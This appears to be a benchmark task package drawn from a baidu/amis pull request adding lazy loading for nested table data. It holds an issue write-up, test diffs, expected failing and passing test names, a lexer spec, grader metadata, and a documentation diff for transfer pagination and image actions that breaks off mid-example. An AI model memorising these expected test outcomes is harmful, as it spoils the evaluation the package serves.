[link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-ae98aab16ce6e5aab35f5adf3debffd7a84d243bf69a51f82c78e6ea57ef0a2cR185-R195), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-ae98aab16ce6e5aab35f5adf3debffd7a84d243bf69a51f82c78e6ea57ef0a2cL323-R403), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-ae98aab16ce6e5aab35f5adf3debffd7a84d243bf69a51f82c78e6ea57ef0a2cR409-R438), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-ae98aab16ce6e5aab35f5adf3debffd7a84d243bf69a51f82c78e6ea57ef0a2cL1324-R1365), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-ae98aab16ce6e5aab35f5adf3debffd7a84d243bf69a51f82c78e6ea57ef0a2cL1345-R1381), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-8fb8c997f3ff51bc659043405077ecb4d0707fcd69ab31bd7cdcb5eeb5c0bd56R136-R140), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-d65258ae6673eb54481e932fd39b426fb60a31ca9cb7430d0cff54fe035efe15L12-R12), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-d65258ae6673eb54481e932fd39b426fb60a31ca9cb7430d0cff54fe035efe15L137-R151), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-a8b4227510cc7dd856d8854c10b9d18799441b0a9ee0733efd30d7ede190844aL10-R11), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-a8b4227510cc7dd856d8854c10b9d18799441b0a9ee0733efd30d7ede190844aR75), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-a8b4227510cc7dd856d8854c10b9d18799441b0a9ee0733efd30d7ede190844aR348-R352), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-a8b4227510cc7dd856d8854c10b9d18799441b0a9ee0733efd30d7ede190844aR650-R661), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-a8b4227510cc7dd856d8854c10b9d18799441b0a9ee0733efd30d7ede190844aR733-R760), 
[link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-43b60bad2b0604663fde07452d82b7576c0d07c3fea6c0a0d6d24a1dd3b82f49R63-R64), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-43b60bad2b0604663fde07452d82b7576c0d07c3fea6c0a0d6d24a1dd3b82f49R367-R368)) * Document the new `deferApi` property for CRUD and Table components in `docs/zh-CN/components/crud.md` and `docs/zh-CN/components/table.md` files ([link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-95eedf8e35f124d56f35a016c1df591c4070cb9aff56cfefc58b33512de87653R3230), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-8a30381c7717a1ae36bd67d653324e6d01991200c0a2f1a0124f1e753d0cf380R1828)) * Add style rules for the spinner and the retry button for deferred data loading in `packages/amis-ui/scss/components/_table.scss` file ([link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-86a8277e8494106d5e5c532d4d8710b1e5b8c84234089da23e1a35e366e6686dR623-R626), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-86a8277e8494106d5e5c532d4d8710b1e5b8c84234089da23e1a35e366e6686dR871-R878)) * Add translation keys and values for the retry button tooltip in locale files ([link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-7c7473c7eeac8c306a9c1dbf7f116bf87b1bcd4c31e9e0f8c619febc67faf8a5R200-R201), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-fb22f243566a7ed671bc6279e3cc6f0a1eddc2fe4259d84b4cb8a7f596987e49R192), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-2fd35dabf975bb2b4ad936c4efcf03b6ce58a0954eba2964acffa8e557091e64R197)) * Remove unused properties and variables from the `Row` and `TableStore` models in `packages/amis-core/src/store/table.ts` file ([link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-ae98aab16ce6e5aab35f5adf3debffd7a84d243bf69a51f82c78e6ea57ef0a2cL130-R169), 
[link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-ae98aab16ce6e5aab35f5adf3debffd7a84d243bf69a51f82c78e6ea57ef0a2cL1301), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-ae98aab16ce6e5aab35f5adf3debffd7a84d243bf69a51f82c78e6ea57ef0a2cL1318)) * Extract common logic for initializing children rows to a separate function in `packages/amis-core/src/store/table.ts` file ([link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-ae98aab16ce6e5aab35f5adf3debffd7a84d243bf69a51f82c78e6ea57ef0a2cR42-R80), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-ae98aab16ce6e5aab35f5adf3debffd7a84d243bf69a51f82c78e6ea57ef0a2cL323-R403), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-ae98aab16ce6e5aab35f5adf3debffd7a84d243bf69a51f82c78e6ea57ef0a2cL1241-L1289)) * Modify the logic of loading a js file as a mock data source in `mock/cfc/mock/index.js` file to support a `cache` property ([link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-c8f6c51e62dacca1b086e6a770c78f883aa9076d82fde1a7bc8da447dc2491edL30-R43)) * Add spaces around the word `Query` in `docs/zh-CN/components/crud.md` file ([link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-95eedf8e35f124d56f35a016c1df591c4070cb9aff56cfefc58b33512de87653L203-R207)) * Remove an empty line in `docs/zh-CN/components/crud.md` file ([link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-95eedf8e35f124d56f35a016c1df591c4070cb9aff56cfefc58b33512de87653L216)) * Add the `translate` property to the `CellProps` interface and the `Cell` and `TableRow` components in `packages/amis/src/renderers/Table/Cell.tsx` and `packages/amis/src/renderers/Table/TableRow.tsx` files, and pass the translation function from the parent component 
([link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-d65258ae6673eb54481e932fd39b426fb60a31ca9cb7430d0cff54fe035efe15R35), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-d65258ae6673eb54481e932fd39b426fb60a31ca9cb7430d0cff54fe035efe15L54-R56), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-d65258ae6673eb54481e932fd39b426fb60a31ca9cb7430d0cff54fe035efe15L172-R191), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-a8b4227510cc7dd856d8854c10b9d18799441b0a9ee0733efd30d7ede190844aL2027-R2075), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-a8b4227510cc7dd856d8854c10b9d18799441b0a9ee0733efd30d7ede190844aR2098), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-43b60bad2b0604663fde07452d82b7576c0d07c3fea6c0a0d6d24a1dd3b82f49R63-R64), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-43b60bad2b0604663fde07452d82b7576c0d07c3fea6c0a0d6d24a1dd3b82f49R367-R368))
**Title** Add lazy‑load support for nested data in Table/CRUD and related UI improvements **Problem** Large hierarchical datasets cause performance issues because Table and CRUD always load all child rows eagerly. There was also no visual feedback or retry mechanism when loading such data fails, and the text‑replacement utility lacked a flexible way to specify ignored keys. **Root Cause** The table store treated all rows as fully materialized and lacked a flag to indicate deferred loading, so expanding a node could not trigger an on‑demand request. UI components did not expose loading or error states, and the replace‑text implementation only accepted a static array of keys. **Fix / Expected Behavior** - Introduce a `deferApi` option and a `defer` flag on rows to enable on‑expand lazy loading of children. - Show a spinner while deferred data is being fetched and a retry button with localized tooltip when loading fails. - Provide a method to reset and reload deferred rows after a retry. - Extend the replace‑text API to accept a function for dynamic ignore‑key logic. - Pass request context to API adaptors and improve filter detection in the formula lexer. - Add drag‑to‑move capability to the image gallery preview. - Wrap tree action icons with tooltip components for consistent hover hints. - Update documentation, examples, and localization keys to reflect the new feature. **Risk & Validation** - Verify that existing tables without `deferApi` continue to work unchanged. - Test lazy loading, spinner, and retry flow with large nested datasets to ensure correct data rendering and error handling. - Confirm that replace‑text still behaves correctly when using both array and function ignore specifications. - Run UI tests for image gallery dragging and tree icon tooltips to ensure no regressions.
8,517
baidu/amis
diff --git a/packages/amis-formula/__tests__/evalute.test.ts b/packages/amis-formula/__tests__/evalute.test.ts index fb30171c4..32d23b1e5 100644 --- a/packages/amis-formula/__tests__/evalute.test.ts +++ b/packages/amis-formula/__tests__/evalute.test.ts @@ -580,3 +580,9 @@ test('evalute:namespace', () => { expect(evaluate('${ls: &["c"]["c"]}', {})).toMatchObject({d: 4}); expect(evaluate('${ls: &["c"][key]}', {})).toMatchObject({d: 4}); }); + +test('evalute:speical characters', () => { + // 优先识别成位运算,而不是过滤器 + expect(evaluate('${1 | 2}', {})).toBe(3); + expect(evaluate('${1 | abc}', {abc: 2})).toBe(3); +}); diff --git a/packages/amis-formula/__tests__/lexer.test.ts b/packages/amis-formula/__tests__/lexer.test.ts index 773032b1d..e431f3d24 100644 --- a/packages/amis-formula/__tests__/lexer.test.ts +++ b/packages/amis-formula/__tests__/lexer.test.ts @@ -31,13 +31,19 @@ test('lexer:simple', () => { test('lexer:filter', () => { expect( getTokens('\\$abc is ${abc | date: YYYY-MM-DD HH\\:mm\\:ss}', { - evalMode: false + evalMode: false, + filters: { + date() {} + } }) ).toMatchSnapshot(); expect( getTokens('\\$abc is ${abc | isTrue : trueValue : falseValue}', { - evalMode: false + evalMode: false, + filters: { + isTrue() {} + } }) ).toMatchSnapshot(); }); @@ -55,7 +61,10 @@ test('lexer:exception', () => { expect(() => getTokens('${a | filter: \\x2}', { - evalMode: false + evalMode: false, + filters: { + filter() {} + } }) ).toThrow('Unexpected token x in 1:17'); }); diff --git a/packages/amis-formula/__tests__/parser.test.ts b/packages/amis-formula/__tests__/parser.test.ts index fa87d1fbb..4c618fa1f 100644 --- a/packages/amis-formula/__tests__/parser.test.ts +++ b/packages/amis-formula/__tests__/parser.test.ts @@ -1,3 +1,4 @@ +import moment from 'moment'; import {parse} from '../src/index'; test('parser:simple', () => { @@ -120,8 +121,12 @@ test('parser:filter', () => { test('parser:filter-escape', () => { expect( parse('\\$abc is ${abc | date: YYYY-MM-DD HH\\:mm\\:ss}', { - 
evalMode: false - }) + evalMode: false, + filters: { + date: (input: any, format = 'LLL', inputFormat = 'X') => + moment(input, inputFormat).format(format) + } + } as any) ).toMatchSnapshot(); }); diff --git a/packages/amis/__tests__/renderers/Form/__snapshots__/index.test.tsx.snap b/packages/amis/__tests__/renderers/Form/__snapshots__/index.test.tsx.snap index b8200254f..c290dc232 100644 --- a/packages/amis/__tests__/renderers/Form/__snapshots__/index.test.tsx.snap +++ b/packages/amis/__tests__/renderers/Form/__snapshots__/index.test.tsx.snap @@ -100,6 +100,9 @@ exports[`Renderer:Form 2`] = ` "onSuccess": [Function], "successMessage": "saveSuccess", }, + "context": { + "a": "123", + }, "data": { "a": "123", }, diff --git a/packages/amis/__tests__/renderers/Form/__snapshots__/initData.test.tsx.snap b/packages/amis/__tests__/renderers/Form/__snapshots__/initData.test.tsx.snap index 17485c66e..f26ffe567 100644 --- a/packages/amis/__tests__/renderers/Form/__snapshots__/initData.test.tsx.snap +++ b/packages/amis/__tests__/renderers/Form/__snapshots__/initData.test.tsx.snap @@ -204,6 +204,9 @@ exports[`Form:initData:remote 2`] = ` "onSuccess": [Function], "successMessage": undefined, }, + "context": { + "c": "123", + }, "method": "get", "query": { "c": "123", diff --git a/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap b/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap index d87b14148..84cec19c7 100644 --- a/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap +++ b/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap @@ -2061,10 +2061,7 @@ exports[`Renderer:transfer follow left mode 1`] = ` <div class="cxd-Tree-item-icons" > - <a - data-position="left" - data-tooltip="移除该节点" - > + <a> <icon-mock classname="icon icon-minus" icon="minus" @@ -2100,10 +2097,7 @@ exports[`Renderer:transfer follow left mode 1`] = ` <div class="cxd-Tree-item-icons" > - <a - 
data-position="left" - data-tooltip="移除该节点" - > + <a> <icon-mock classname="icon icon-minus" icon="minus" @@ -2725,10 +2719,7 @@ exports[`Renderer:transfer follow left mode 2`] = ` <div class="cxd-Tree-item-icons" > - <a - data-position="left" - data-tooltip="移除该节点" - > + <a> <icon-mock classname="icon icon-minus" icon="minus" @@ -2764,10 +2755,7 @@ exports[`Renderer:transfer follow left mode 2`] = ` <div class="cxd-Tree-item-icons" > - <a - data-position="left" - data-tooltip="移除该节点" - > + <a> <icon-mock classname="icon icon-minus" icon="minus" diff --git a/packages/amis/__tests__/renderers/Image.test.tsx b/packages/amis/__tests__/renderers/Image.test.tsx index 61389eec5..45192f014 100644 --- a/packages/amis/__tests__/renderers/Image.test.tsx +++ b/packages/amis/__tests__/renderers/Image.test.tsx @@ -216,12 +216,12 @@ describe('Renderer:image', () => { const imgIns = baseElement.querySelector('.cxd-ImageGallery-main img')!; expect(imgIns).toHaveStyle({ - transform: 'scale(1) rotate(0deg)' + transform: 'translate(0px, 0px) scale(1) rotate(0deg)' }); fireEvent.click(actions[1].firstElementChild!); expect(imgIns).toHaveStyle({ - transform: 'scale(1) rotate(90deg)' + transform: 'translate(0px, 0px) scale(1) rotate(90deg)' }); });
[ "evalute:speical characters" ]
[ "lexer:simple", "lexer:filter", "lexer:exception", "parser:simple", "parser:complex", "parser:evalMode", "parser:template", "parser:string", "parser:number", "parser:single-string", "parser:object-literall", "parser:array-literall", "parser:variable-geter", "parser:variable-geter2", "parser:multi-expression", "parser:functionCall", "parser:filter", "parser:filter-escape", "parser:conditional", "parser:binary-expression", "parser:group-expression", "parser:unary-expression", "parser:anonymous-function", "evalute:simple", "evalute:filter", "evalute:filter2", "evalute:filter3", "evalute:filter4", "evalute:oldVariable", "evalute:ariable2", "evalute:ariable3", "evalute:object-variable", "evalute:literal-variable", "evalute:tempalte", "evalute:literal", "evalute:variableName", "evalute:3-1", "evalate:0.1+0.2", "evalute:variable:com.xxx.xx", "evalute:anonymous:function", "evalute:anonymous:function2", "evalute:array:func", "evalute:ISTYPE", "async-evalute:namespace", "evalute:keywords", "evalute:Math", "evalute:namespace", "formula:expression", "formula:expression2", "formula:expression3", "formula:if", "formula:and", "formula:or", "formula:xor", "formula:ifs", "formula:math", "formula:text", "formula:date", "formula:last", "formula:basename", "formula:customFunction" ]
Function: lexer(input: string, options: LexerOptions = {}) Location: packages/amis-formula/src/lexer.ts Inputs: - **input** `string` – the raw formula expression to be tokenised. - **options** `LexerOptions` (optional, default `{}`) – configuration object that may contain: - `evalMode` `boolean` – treat the input as an evaluation expression. - `variableMode` `boolean` – treat the input as a variable expression. - `allowFilter` `boolean` – enable the `|` filter operator (default `true`). - `isFilter?: (name: string) => boolean` – callback used to decide whether a name after a `|` token should be interpreted as a filter (when `true`) or as a bitwise operator (when `false`). - `filters?: Record<string, Function>` – optional map of custom filter functions (used only for the callback’s default behaviour). Outputs: Returns an array of `Token` objects representing the lexical tokens of the input. May throw an error on unexpected characters (e.g., “Unexpected token x in 1:17”). Description: Performs lexical analysis for the Amis formula language. The signature was changed to make the `options` argument non‑optional (defaulting to an empty object) and to add the `isFilter` callback, allowing the lexer to distinguish between filter usage (`| filter`) and bitwise‑OR usage (`|` as an operator). This enables tests such as evaluating `${1 | 2}` to be parsed correctly as a bitwise operation rather than a filter.
custom-check-github
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "cd packages/amis-formula && npx jest --verbose --no-color" }
{ "num_modified_files": 30, "num_modified_lines": 1055, "pr_author": "2betop", "pr_labels": [ "feat" ], "llm_metadata": { "code": "B1", "code_quality": null, "confidence": 0.96, "detected_issues": { "B1": true, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "hard", "external_urls": [ "https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-95eedf8e35f124d56f35a016c1df591c4070cb9aff56cfefc58b33512de87653R586-R640" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue describes adding a `deferApi` feature for lazy loading nested data in Table/CRUD components. However, the provided test patch touches unrelated parts of the codebase (formula lexer, image gallery transforms, transfer component snapshots, etc.) and introduces new test expectations that are not mentioned in the issue. This indicates a coupling between the feature fix and many unrelated tests, suggesting the problem is not a clean, self‑contained task but an environment‑setup issue. Therefore the primary classification is B1 (test suite coupling).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests for amis‑formula lexer now expect filter detection logic not described in the issue.", "Image gallery snapshot expects transform changes (translate) unrelated to Table feature.", "Transfer component snapshots have altered tooltip attributes unrelated to Table feature.", "Various UI component snapshots and styles are modified without mention in the issue." 
], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
8af076ce0ef89d5993c9f80ad2b54387c83392ec
2023-11-06 06:13:18
github-actions[bot]: <!-- Labeler (https://github.com/jimschubert/labeler) --> 👍 Thanks for this! 🏷 I have applied any labels matching special text in your issue. Please review the labels and make any necessary changes. lurunze1226: 补充: - `showTableAddBtn` - `showFooterAddBtn` - `toolbarClassName`
baidu__amis-8629
diff --git a/docs/zh-CN/components/form/transfer.md b/docs/zh-CN/components/form/transfer.md index c2c05e5f3..dfaa00e19 100644 --- a/docs/zh-CN/components/form/transfer.md +++ b/docs/zh-CN/components/form/transfer.md @@ -878,12 +878,95 @@ icon: } ``` +## 分页 + +> `3.6.0`及以上版本 + +当数据量庞大时,可以开启数据源分页,此时左侧列表底部会出现分页控件,相关配置参考属性表。通常在提交表单中使用分页场景,处理数据量较大的数据源。如果需要在表单中回显已选值,建议同时设置`{"joinValues": false, "extractValue": false}`,因为已选数据可能位于不同的分页,如果仅使用value值作为提交值,可能会导致右侧结果区无法正确渲染。 + +> 仅列表(list)和表格(table)展示模式支持分页,接口的数据结构参考[CRUD数据源接口格式](../crud#数据结构) + +```schema: scope="body" +{ + "type": "form", + "debug": true, + "body": [ + { + "label": "默认", + "type": "transfer", + "name": "transfer", + "joinValues": false, + "extractValue": false, + "source": "/api/mock2/options/transfer?page=${page}&perPage=${perPage}", + "pagination": { + "enable": true, + "layout": ["pager", "perpage", "total"], + "popOverContainerSelector": ".cxd-Panel--form" + }, + "value": [ + {"label": "Laura Lewis", "value": "1", "id": 1}, + {"label": "Christopher Rodriguez", "value": "3", "id": 3}, + {"label": "Laura Miller", "value": "12", "id": 12}, + {"label": "Patricia Robinson", "value": "14", "id": 14} + ] + } + ] +} +``` + +### 前端分页 + +> `3.6.0`及以上版本 + +当使用数据域变量作为数据源时,支持实现前端一次性加载并分页 + +```schema: scope="body" +{ + "type": "form", + "debug": true, + "body": [ + { + "type": "service", + "api": { + "url": "/api/mock2/options/loadDataOnce", + "method": "get", + "responseData": { + "transferOptions": "${items}" + } + }, + "body": [ + { + "label": "默认", + "type": "transfer", + "name": "transfer", + "joinValues": false, + "extractValue": false, + "source": "${transferOptions}", + "pagination": { + "enable": true, + "layout": ["pager", "perpage", "total"], + "popOverContainerSelector": ".cxd-Panel--form" + }, + "value": [ + {"label": "Laura Lewis", "value": "1", "id": 1}, + {"label": "Christopher Rodriguez", "value": "3", "id": 3}, + {"label": "Laura Miller", "value": "12", "id": 12}, + {"label": "Patricia Robinson", 
"value": "14", "id": 14} + ] + } + ] + } + ] +} +``` + + ## 属性表 除了支持 [普通表单项属性表](./formitem#%E5%B1%9E%E6%80%A7%E8%A1%A8) 中的配置以外,还支持下面一些配置 -| 属性名 | 类型 | 默认值 | 说明 | -| -------------------------- | ----------------------------------------------------- | ------------ | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | +| 属性名 | 类型 | 默认值 | 说明 | 版本 | +| -------------------------- | ----------------------------------------------------- | ------------ | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --- | | options | `Array<object>`或`Array<string>` | | [选项组](./options#%E9%9D%99%E6%80%81%E9%80%89%E9%A1%B9%E7%BB%84-options) | | source | `string`或 [API](../../../docs/types/api) | | [动态选项组](./options#%E5%8A%A8%E6%80%81%E9%80%89%E9%A1%B9%E7%BB%84-source) | | delimeter | `string` | `false` | [拼接符](./options#%E6%8B%BC%E6%8E%A5%E7%AC%A6-delimiter) | @@ -909,6 +992,13 @@ icon: | valueTpl | `string` \| [SchemaNode](../../docs/types/schemanode) | | 用来自定义值的展示 | | itemHeight | `number` | `32` | 每个选项的高度,用于虚拟渲染 | | virtualThreshold | `number` | `100` | 在选项数量超过多少时开启虚拟渲染 | +| pagination | `object` | | 分页配置 | `3.6.0` | +| pagination.className | `string` | | 分页控件CSS类名 | `3.6.0` | +| pagination.enable | `boolean` | | 是否开启分页 | `3.6.0` | +| pagination.layout | `string` \| `string[]` | `["pager"]` | 通过控制 layout 属性的顺序,调整分页结构布局 | `3.6.0` | +| pagination.perPageAvailable | `number[]` | `[10, 20, 50, 100]` | 指定每页可以显示多少条 | `3.6.0` | +| pagination.maxButtons | `number` | `5` | 最多显示多少个分页按钮,最小为 5 | `3.6.0` | +| pagination.popOverContainerSelector | `string` | | 切换每页条数的控件挂载点 | `3.6.0` | ## 事件表 diff --git a/docs/zh-CN/components/image.md b/docs/zh-CN/components/image.md index 52b722469..98e0a8c55 
100755 --- a/docs/zh-CN/components/image.md +++ b/docs/zh-CN/components/image.md @@ -433,31 +433,33 @@ List 的内容、Card 卡片的内容配置同上 ## 属性表 -| 属性名 | 类型 | 默认值 | 说明 | 版本 | -| ------------------ | ------------------------------------ | --------- | --------------------------------------------------------------------------------------------- | ------- | -| type | `string` | | 如果在 Table、Card 和 List 中,为`"image"`;在 Form 中用作静态展示,为`"static-image"` | -| className | `string` | | 外层 CSS 类名 | -| innerClassName | `string` | | 组件内层 CSS 类名 | -| imageClassName | `string` | | 图片 CSS 类名 | -| thumbClassName | `string` | | 图片缩率图 CSS 类名 | -| height | `string` | | 图片缩率高度 | -| width | `string` | | 图片缩率宽度 | -| title | `string` | | 标题 | -| imageCaption | `string` | | 描述 | -| placeholder | `string` | | 占位文本 | -| defaultImage | `string` | | 无数据时显示的图片 | -| src | `string` | | 缩略图地址 | -| href | [模板](../../docs/concepts/template) | | 外部链接地址 | -| originalSrc | `string` | | 原图地址 | -| enlargeAble | `boolean` | | 支持放大预览 | -| enlargeTitle | `string` | | 放大预览的标题 | -| enlargeCaption | `string` | | 放大预览的描述 | -| enlargeWithGallary | `string` | `true` | 在表格中,图片的放大功能会默认展示所有图片信息,设置为`false`将关闭放大模式下图片集列表的展示 | -| thumbMode | `string` | `contain` | 预览图模式,可选:`'w-full'`, `'h-full'`, `'contain'`, `'cover'` | -| thumbRatio | `string` | `1:1` | 预览图比例,可选:`'1:1'`, `'4:3'`, `'16:9'` | -| imageMode | `string` | `thumb` | 图片展示模式,可选:`'thumb'`, `'original'` 即:缩略图模式 或者 原图模式 | -| showToolbar | `boolean` | `false` | 放大模式下是否展示图片的工具栏 | `2.2.0` | -| toolbarActions | `ImageAction[]` | | 图片工具栏,支持旋转,缩放,默认操作全部开启 | `2.2.0` | +| 属性名 | 类型 | 默认值 | 说明 | 版本 | +| ------------------ | ------------------------------------------------ | --------- | --------------------------------------------------------------------------------------------- | ------- | +| type | `string` | | 如果在 Table、Card 和 List 中,为`"image"`;在 Form 中用作静态展示,为`"static-image"` | +| className | `string` | | 外层 CSS 类名 | +| innerClassName | `string` | | 组件内层 CSS 类名 | +| imageClassName | 
`string` | | 图片 CSS 类名 | +| thumbClassName | `string` | | 图片缩率图 CSS 类名 | +| height | `string` | | 图片缩率高度 | +| width | `string` | | 图片缩率宽度 | +| title | `string` | | 标题 | +| imageCaption | `string` | | 描述 | +| placeholder | `string` | | 占位文本 | +| defaultImage | `string` | | 无数据时显示的图片 | +| src | `string` | | 缩略图地址 | +| href | [模板](../../docs/concepts/template) | | 外部链接地址 | +| originalSrc | `string` | | 原图地址 | +| enlargeAble | `boolean` | | 支持放大预览 | +| enlargeTitle | `string` | | 放大预览的标题 | +| enlargeCaption | `string` | | 放大预览的描述 | +| enlargeWithGallary | `string` | `true` | 在表格中,图片的放大功能会默认展示所有图片信息,设置为`false`将关闭放大模式下图片集列表的展示 | +| thumbMode | `string` | `contain` | 预览图模式,可选:`'w-full'`, `'h-full'`, `'contain'`, `'cover'` | +| thumbRatio | `string` | `1:1` | 预览图比例,可选:`'1:1'`, `'4:3'`, `'16:9'` | +| imageMode | `string` | `thumb` | 图片展示模式,可选:`'thumb'`, `'original'` 即:缩略图模式 或者 原图模式 | +| showToolbar | `boolean` | `false` | 放大模式下是否展示图片的工具栏 | `2.2.0` | +| toolbarActions | `ImageAction[]` | | 图片工具栏,支持旋转,缩放,默认操作全部开启 | `2.2.0` | +| maxScale | `number` 或 [模板](../../docs/concepts/template) | | 执行调整图片比例动作时的最大百分比 | `3.4.4` | +| minScale | `number` 或 [模板](../../docs/concepts/template) | | 执行调整图片比例动作时的最小百分比 | `3.4.4` | #### ImageAction @@ -475,3 +477,170 @@ interface ImageAction { disabled?: boolean; } ``` + +## 事件表 + +当前组件会对外派发以下事件,可以通过`onEvent`来监听这些事件,并通过`actions`来配置执行的动作,在`actions`中可以通过`${事件参数名}`或`${event.data.[事件参数名]}`来获取事件产生的数据,详细查看[事件动作](../../docs/concepts/event-action)。 + +| 事件名称 | 事件参数 | 说明 | +| ---------- | ---------- | -------------- | +| click | 上下文数据 | 点击图片时触发 | +| mouseenter | 上下文数据 | 鼠标移入时触发 | +| mouseleave | 上下文数据 | 鼠标移入时触发 | + +### click / mouseenter / mouseleave + +点击图片 / 鼠标移入图片 / 鼠标移出图片,可以尝试通过${event.context.nativeEvent}获取鼠标事件对象。 + +```schema: scope="body" +{ + "type": "image", + "src": "https://internal-amis-res.cdn.bcebos.com/images/2020-1/1578395692722/4f3cb4202335.jpeg@s_0,w_216,l_1,f_jpg,q_80", + "onEvent": { + "click": { + "actions": [ + { + "actionType": 
"toast", + "args": { + "msg": "图片被点击了" + } + } + ] + }, + "mouseenter": { + "actions": [ + { + "actionType": "toast", + "args": { + "msg": "鼠标移入图片" + } + } + ] + }, + "mouseleave": { + "actions": [ + { + "actionType": "toast", + "args": { + "msg": "鼠标移出图片" + } + } + ] + } + } +} +``` + +## 动作表 + +当前组件对外暴露以下特性动作,其他组件可以通过指定`actionType: 动作名称`、`componentId: 该组件id`来触发这些动作,动作配置可以通过`args: {动作配置项名称: xxx}`来配置具体的参数,详细请查看[事件动作](../../docs/concepts/event-action#触发其他组件的动作)。 + +| 动作名称 | 动作配置 | 说明 | +| -------- | ------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------ | +| preview | - | 预览图片 | +| zoom | `scale: number` 或 `scale: `[模板](../../docs/concepts/template),定义每次放大或缩小图片的百分比大小,正值为放大,负值为缩小,默认 50 | 调整图片比例,将图片等比例放大或缩小 | + +### preview + +预览图片,可以通过配置`originalSrc`来指定预览的原图地址。 + +```schema: scope="body" +{ + "type": "page", + "body": { + "type": "container", + "body": [ + { + "type": "container", + "body": [ + { + "type": "image", + "className": "mb-1", + "src": "https://internal-amis-res.cdn.bcebos.com/images/2020-1/1578395692722/4f3cb4202335.jpeg@s_0,w_216,l_1,f_jpg,q_80", + "originalSrc": "https://internal-amis-res.cdn.bcebos.com/images/2020-1/1578395692722/4f3cb4202335.jpeg", + "id": "previewImage" + } + ] + }, + { + "type": "action", + "label": "预览图片", + "onEvent": { + "click": { + "actions": [ + { + "actionType": "preview", + "componentId": "previewImage" + } + ] + } + } + } + ] + } +} +``` + +### zoom + +调整图片比例,将图片等比例放大或缩小。可以通过配置图片的`maxScale`和`minScale`来限制调整的比例。 + +```schema: scope="body" +{ + "type": "page", + "body": { + "type": "container", + "body": [ + { + "type": "flex", + "items": [ + { + "type": "image", + "innerClassName": "no-border", + "className": "mt-5 mb-5", + "src": "https://internal-amis-res.cdn.bcebos.com/images/2020-1/1578395692722/4f3cb4202335.jpeg@s_0,w_216,l_1,f_jpg,q_80", + "maxScale": 200, + "minScale": 20, + "id": "zoomImage" + } + ] + 
